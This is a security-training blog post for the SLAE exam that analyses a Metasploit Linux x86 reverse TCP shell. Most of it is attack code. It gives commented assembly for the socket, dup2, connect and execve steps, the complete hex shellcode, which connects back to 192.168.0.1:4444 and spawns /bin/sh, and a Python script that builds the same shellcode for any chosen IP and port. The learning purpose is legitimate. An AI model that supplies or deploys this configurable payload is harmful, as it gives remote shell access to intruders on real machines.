SLAE – Assignment #2: Reverse TCP Shell
Table of Contents
Assignment #2: Reverse TCP Shell
Create a shell_reverse_tcp shellcode that connects back to an IP address, on a specific a port and execute a shell. The IP address and port number should be easy configurable.
Again, instead of going for the path of writing a C TCP reverse shell from scratch, I decided to generate a raw Metasploit payload and analyze it with libemu.
Analyzing the Shellcode
All the code is also available on GitHub.
This time the analysis will be a lot shorter due the fact that we can reuse a lot of the code that we had already analyzed the previous assignment.
I’ve generated the graph with libemu in order to simplify our analysis:
Analyzing the image, we can understand that the shellcode needs to perform the following steps:
- Create a socket
- Duplicate the file descriptors
- Connect to the specified IP and port
- Execute /bin/sh via execve
ASM:
;----------- Create Socket ---------------------------- xor ebx,ebx ; resetting the registers mul ebx push ebx ; 0 (protocol) inc ebx ; ebx = 1 push ebx ; 1 (SOCK_STREAM) push byte +0x2 ; 2 (AF_INET) mov ecx,esp ; ecx = args array struct mov al,0x66 ; syscall 102 (socketcall) int 0x80 ; syscall ;----------- Duplicate the file descriptor ------------ xchg eax,ebx pop ecx mov al,0x3f ; syscall 63 (dup) int 0x80 ; syscall dec ecx ; decrement counter jns 0x11 ;loop ;----------- Connect ----------------------------------- push dword 0x100a8c0 ; pushing IP address (1.0.168.192) push dword 0x5c110002 ; pushing port number 4444 mov ecx,esp mov al,0x66 ; socket syscall push eax push ecx push ebx mov bl,0x3 ; type of socketcall (3=connect) mov ecx,esp ; stack pointer to sockaddr_structure int 0x80 ; syscall ;----------- Execve ----------------------------------- push edx push dword 0x68732f6e ; hs// push dword 0x69622f2f ; nib/ mov ebx,esp ; ebx = //bin/sh push edx push ebx mov ecx,esp ; argv = [filename,0] mov al,0xb ; syscall 12 (execve) int 0x80 ; syscall
Here the HEX encoded Metasploit payload:
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x00\x01\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80
Knowing that our shellcode was configured for port 4444 (hex 5c11, accounting the endianness) and IP address, I built a simple python script allowing me to easily replace the port and IP address in our shellcode.
# Paolo Stagno aka [VoidSec](https://voidsec.com) # SLAE-1511 #!/usr/bin/env python import sys; if (len(sys.argv) != 3): print ("usage: " + sys.argv[0] + " ip port"); sys.exit(-1) else: ip = sys.argv[1] hip = "\\x"+"\\x".join([hex(int(x)+256)[3:] for x in ip.split('.')]) port = int(sys.argv[2]) if port < 0 or port > 65535: print "[!] Invalid TCP port number {}, must be between 0-65535".format(port) sys.exit(-1) # convert to hex and strip 0x hport=hex(port).strip("0x") # add an \\x every 2 chars hport="\\x"+"\\x".join(a+b for a,b in zip(hport[::2],hport[1::2])) shellcode="\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x93\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x68{}\\x68\\x02\\x00{}\\x89\\xe1\\xb0\\x66\\x50\\x51\\x53\\xb3\\x03\\x89\\xe1\\xcd\\x80\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80".format(hip,hport) print "Reverse TCP shellcode connecting to {}:{} - {}:{}".format(ip,port,hip,hport) print "\n"+shellcode
SLAE Exam Statement
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
Student ID: SLAE-1511